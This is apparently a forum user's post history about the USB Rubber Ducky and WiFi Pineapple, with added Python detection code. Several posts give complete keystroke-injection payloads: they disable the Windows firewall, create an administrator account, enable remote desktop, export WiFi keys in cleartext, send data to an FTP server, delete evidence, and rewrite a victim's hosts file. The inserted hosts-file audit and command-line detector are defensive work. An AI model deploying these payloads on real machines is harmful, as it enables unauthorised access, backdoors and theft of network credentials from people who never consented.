Bucky67GTO (Active Members; 47 posts; Days Won: 3)

Posts posted by Bucky67GTO

  1. For recovering the hardware adapters, re-flashing did not work.

    What did work was resetting to factory and reinstalling the manager.

    Took me a whopping 10 minutes to reinstall all the infusions.

    By the way, thanks, Whistle Master.... fantastic infusions.

  2. Does anyone know how to make a new payload page on the USB Rubber Ducky GitHub page? I keep trying to upload a couple of the payloads I made, and can't seem to figure out how it works.

    Sure. Edit the page, copy one of the links and change it to what you want the payload to be named, and paste it after the last item in the list. Save it and it will turn red. Click that link and it will prompt you to create the new page that it will link to. Enjoy.

  3. OK all... Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. I am thinking something like netcat in the Unix world? As always, ideas?

    DELAY 2000
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    CTRL-SHIFT ENTER
    DELAY 400
    ALT y
    ENTER
    DELAY 400
    STRING netsh firewall set opmode mode=disable
    ENTER
    DELAY 400
    STRING net user /add username password
    ENTER
    DELAY 400
    STRING net localgroup administrators username /add
    ENTER
    DELAY 400
    STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    ENTER
    DELAY 400
    STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    ENTER
    DELAY 400
    STRING sc config TermService start= auto
    ENTER
    DELAY 400
    STRING net start Termservice
    ENTER
    DELAY 400
    STRING cd %USERPROFILE%
    ENTER
    DELAY 400
    STRING ipconfig /all > number.txt
    ENTER
    DELAY 400
    STRING ftp -i ftp server
    ENTER
    DELAY 400
    STRING login name
    ENTER
    DELAY 400
    STRING login password
    ENTER
    DELAY 600
    STRING prompt
    ENTER
    DELAY 400
    STRING prompt
    ENTER
    DELAY 400
    STRING PUT number.txt
    ENTER
    DELAY 2000
    STRING bye
    ENTER
    DELAY 400
    STRING del number.txt
    ENTER
    DELAY 400
    ALT SPACE
    STRING c
  4. Thanks for the input. I was looking on the WIKI to find something that could manipulate the connection to the internet and did not find anything. Sorry I did not see the post earlier. I did not look within a posting for the rickroll.

    What does CTRL+SHIFT+ENTER do? -> this opens the cmd window as the administrator, not sure that it works in XP, but I was focusing on Windows 7.

    I really was just focusing on a quick way to manipulate the hosts file.

  5. Time for round 2 - MissDirection - edits the hosts file of the victim computer, rerouting it to wherever you choose. You can add multiple lines, but this one should give you the idea. Feedback is always appreciated. Also, be sure to use the 2.2 version of the encoder. Is it worth putting in the WIKI?

    DELAY 2000
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    CTRL-SHIFT ENTER
    DELAY 400
    STRING cd C:\Windows\System32\drivers\etc\
    ENTER
    DELAY 400
    STRING echo 64.149.122.94 www.test.com>>hosts
    ENTER
    DELAY 400
    ALT SPACE
    STRING c
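The post above appends one line to the hosts file, which is exactly the change a defender wants to notice. The following is an added example (not the author's code and not from the Hak5 wiki) of a hosts-file audit in Python: it parses hosts-file text, flags any name that resolves to a routable address rather than loopback, link-local or the unspecified address, and diffs the current file against a known-good copy. The sample hosts contents are constructed here; the only page-derived value is the `64.149.122.94 www.test.com` entry from the script above.

```python
import ipaddress
from typing import List, NamedTuple, Tuple

# Constructed sample files (not taken from a real machine). The "current" copy
# has one line appended the way the post above appends it with echo ... >>hosts.
BASELINE_HOSTS = """\
# constructed baseline hosts file
127.0.0.1       localhost
::1             localhost
"""

CURRENT_HOSTS = BASELINE_HOSTS + "64.149.122.94 www.test.com\n"


class HostsEntry(NamedTuple):
    line_no: int
    address: str
    names: Tuple[str, ...]


def parse_hosts(text: str) -> List[HostsEntry]:
    """Parse hosts-file text into entries, ignoring comments and blank lines."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        parts = line.split()
        if len(parts) < 2:                     # blank, comment-only or malformed
            continue
        entries.append(HostsEntry(line_no, parts[0], tuple(parts[1:])))
    return entries


def is_local_address(address: str) -> bool:
    """Loopback, link-local and unspecified (0.0.0.0 / ::) addresses are the
    only targets a stock hosts file or an ad-blocking list normally uses."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False  # not even a valid address: treat as suspicious
    return ip.is_loopback or ip.is_link_local or ip.is_unspecified


def suspicious_entries(entries, allowlist=frozenset()):
    """Entries that send a name to a routable address not explicitly allowed."""
    return [e for e in entries
            if not is_local_address(e.address) and e.address not in allowlist]


def added_entries(baseline_text, current_text):
    """Entries present in the current file but absent from a known-good copy."""
    baseline = {(e.address, e.names) for e in parse_hosts(baseline_text)}
    return [e for e in parse_hosts(current_text)
            if (e.address, e.names) not in baseline]


if __name__ == "__main__":
    for e in suspicious_entries(parse_hosts(CURRENT_HOSTS)):
        print(f"line {e.line_no}: {e.address} -> {', '.join(e.names)}")
    for e in added_entries(BASELINE_HOSTS, CURRENT_HOSTS):
        print(f"added since baseline: line {e.line_no}: {e.address} {' '.join(e.names)}")
```

On a real Windows host the file to read is `%SystemRoot%\System32\drivers\etc\hosts`; keeping a hashed or versioned baseline of it and running the diff on a schedule catches this edit regardless of which address or name the attacker chose.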
    
  6. OK, rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. Sooooooo. The first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of the duck encoder - props to Dnucna). The first string then disables the firewall, then the rest of the code works fine. You may want to tweak the delay after the ftp session depending on upload speed..... enjoy

    Please let me know if you have ideas for additions/improvements.

    DELAY 2000
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    CTRL-SHIFT ENTER
    DELAY 400
    STRING netsh firewall set opmode mode=disable
    ENTER
    DELAY 400
    STRING netsh wlan export profile key=clear
    ENTER
    DELAY 400
    STRING cd %USERPROFILE%
    ENTER
    DELAY 400
    STRING ftp -i ftp server
    ENTER
    DELAY 400
    STRING username
    ENTER
    DELAY 400
    STRING password
    ENTER
    DELAY 600
    STRING prompt
    ENTER
    DELAY 400
    STRING prompt
    ENTER
    DELAY 400
    STRING MPUT *.xml
    ENTER
    DELAY 4000
    STRING bye
    ENTER
    DELAY 400
    STRING del *.xml
    ENTER
    DELAY 200
    STRING netsh firewall set opmode mode=enable
    ENTER
    DELAY 400
    ALT SPACE
    STRING c
  7. OK, had some fun with the Duck, now I am playing with my new Pineapple IV. Got in once, played a bit and changed the SSID, but nothing else other than downloading some of the attacks. Now I cannot log in with root and default. It seems to be functioning. I can ping the interfaces and it even seems to be accepting connections on the new SSID. How can I reset this darn thing?

  8. For Windows 7... This script will export the wifi settings, then send them to an ftp server of your choice. The cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but it works in under a minute.

    DELAY 2000
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    ENTER
    DELAY 400
    STRING netsh wlan export profile key=clear
    ENTER
    DELAY 400
    STRING cd %USERPROFILE%
    ENTER
    DELAY 400
    STRING ftp -i FTPSERVER
    ENTER
    DELAY 400
    STRING LOGIN NAME
    ENTER
    DELAY 400
    STRING LOGIN PASSWORD
    ENTER
    DELAY 600
    STRING prompt
    ENTER
    DELAY 400
    STRING prompt
    ENTER
    DELAY 400
    STRING MPUT *.xml
    ENTER
    DELAY 2000
    STRING bye
    ENTER
    DELAY 400
    STRING del *.xml
    ENTER
    DELAY 200
    ALT SPACE
    STRING c
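Every payload on this page (posts 3, 6 and 8) runs a short burst of built-in Windows commands from one console: firewall off, `net user /add`, `net localgroup administrators ... /add`, the Terminal Server registry keys, `sc config TermService`, `netsh wlan export profile key=clear` and an interactive `ftp -i` session. Each command on its own is something an administrator might legitimately type; the signal is several of them from the same host within seconds. The following is an added example, not the author's code or a published ruleset, of a Python detector that scores process-creation command lines against those indicators and alerts when the weighted hits from one host cluster inside a time window. The log format, hostnames, rule names, weights and threshold are this example's own constructions; the `netsh advfirewall ... state off` alternative in the first rule is a generalization beyond the page, since newer Windows versions use that syntax.

```python
import re
from collections import defaultdict
from datetime import datetime

# Detection rules: (name, pattern over the process command line, weight).
# Names and weights are this example's own choices, not a published ruleset.
RULES = [
    ("firewall_disabled",
     re.compile(r"netsh\s+(firewall\s+set\s+opmode\s+mode=disable"
                r"|advfirewall\s+set\s+\w+\s+state\s+off)", re.I), 3),
    ("local_user_added",
     re.compile(r"\bnet\s+user\s+(/add\b|\S+\s+\S+\s+/add\b)", re.I), 3),
    ("added_to_administrators",
     re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 4),
    ("rdp_enabled_via_registry",
     re.compile(r"\breg\s+add\b.*terminal server.*"
                r"(fDenyTSConnections|AllowTSConnections)", re.I), 3),
    ("termservice_autostart",
     re.compile(r"\bsc\s+config\s+termservice\s+start=\s*auto\b", re.I), 2),
    ("wifi_profile_export_cleartext",
     re.compile(r"netsh\s+wlan\s+export\s+profile\b.*key=clear", re.I), 4),
    ("interactive_ftp_client",
     re.compile(r"(^|\\|\s)ftp(\.exe)?\s+-i\b", re.I), 2),
]

# One event per line: <ISO timestamp> host=<name> user=<domain\user> cmd=<command line>
LINE_RE = re.compile(r"^(\S+)\s+host=(\S+)\s+user=(\S+)\s+cmd=(.*)$")

# Constructed sample export of process-creation events (the shape of a Sysmon
# event 1 / Security 4688 export reduced to the fields used here). Not real logs.
SAMPLE_LOG = r"""
2012-06-01T10:00:00 host=WS01 user=WS01\alice cmd=cmd.exe
2012-06-01T10:00:01 host=WS01 user=WS01\alice cmd=netsh firewall set opmode mode=disable
2012-06-01T10:00:02 host=WS01 user=WS01\alice cmd=net user /add username password
2012-06-01T10:00:03 host=WS01 user=WS01\alice cmd=net localgroup administrators username /add
2012-06-01T10:00:04 host=WS01 user=WS01\alice cmd=reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
2012-06-01T10:00:05 host=WS01 user=WS01\alice cmd=sc config TermService start= auto
2012-06-01T10:00:06 host=WS01 user=WS01\alice cmd=ipconfig /all
2012-06-01T10:00:07 host=WS01 user=WS01\alice cmd=ftp -i ftp.example.invalid
2012-06-01T11:30:00 host=WS02 user=WS02\bob cmd=net user bob
2012-06-01T11:31:00 host=WS02 user=WS02\bob cmd=netsh wlan show profiles
2012-06-01T14:00:00 host=WS03 user=WS03\carol cmd=netsh wlan export profile key=clear
2012-06-01T14:00:05 host=WS03 user=WS03\carol cmd=ftp -i FTPSERVER
"""


def parse_events(text):
    """Parse the constructed export format into event dicts; skip other lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, host, user, cmd = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "user": user, "cmd": cmd})
    return events


def match_rules(cmd):
    """Names and weights of every rule whose pattern occurs in a command line."""
    return [(name, weight) for name, pattern, weight in RULES if pattern.search(cmd)]


def scan(events, window_seconds=300, threshold=6):
    """Cluster rule hits per host inside a time window and alert when the summed
    weight reaches the threshold. No single rule weighs 6, so one admin running
    `sc config` or `net user /add` on its own does not page anyone."""
    hits_by_host = defaultdict(list)
    for ev in events:
        hits = match_rules(ev["cmd"])
        if hits:
            hits_by_host[ev["host"]].append((ev["ts"], hits, ev["cmd"]))

    alerts = []
    for host, hits in hits_by_host.items():
        hits.sort(key=lambda h: h[0])
        cluster = []
        for item in hits:
            if cluster and (item[0] - cluster[0][0]).total_seconds() > window_seconds:
                alerts.extend(_summarise(host, cluster, threshold))
                cluster = []
            cluster.append(item)
        alerts.extend(_summarise(host, cluster, threshold))
    return alerts


def _summarise(host, cluster, threshold):
    """Turn one cluster of hits into an alert record if it scores high enough."""
    if not cluster:
        return []
    score = sum(w for _, hits, _ in cluster for _, w in hits)
    if score < threshold:
        return []
    return [{"host": host,
             "start": cluster[0][0],
             "score": score,
             "rules": sorted({name for _, hits, _ in cluster for name, _ in hits}),
             "commands": [cmd for _, _, cmd in cluster]}]


if __name__ == "__main__":
    for alert in scan(parse_events(SAMPLE_LOG)):
        print(f"{alert['host']} at {alert['start']}: score {alert['score']}, "
              f"rules {', '.join(alert['rules'])}")
```

The `key=clear` export plus an FTP client alone is enough to cross the threshold, which matches the author's point that the export is the valuable part; the WS02 lines show why the patterns anchor on `/add` and `export profile` rather than on `net user` or `netsh wlan` generally. Turning on command-line auditing (Sysmon event 1 or 4688 with command-line logging) is the prerequisite; without it none of these commands leave a record.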
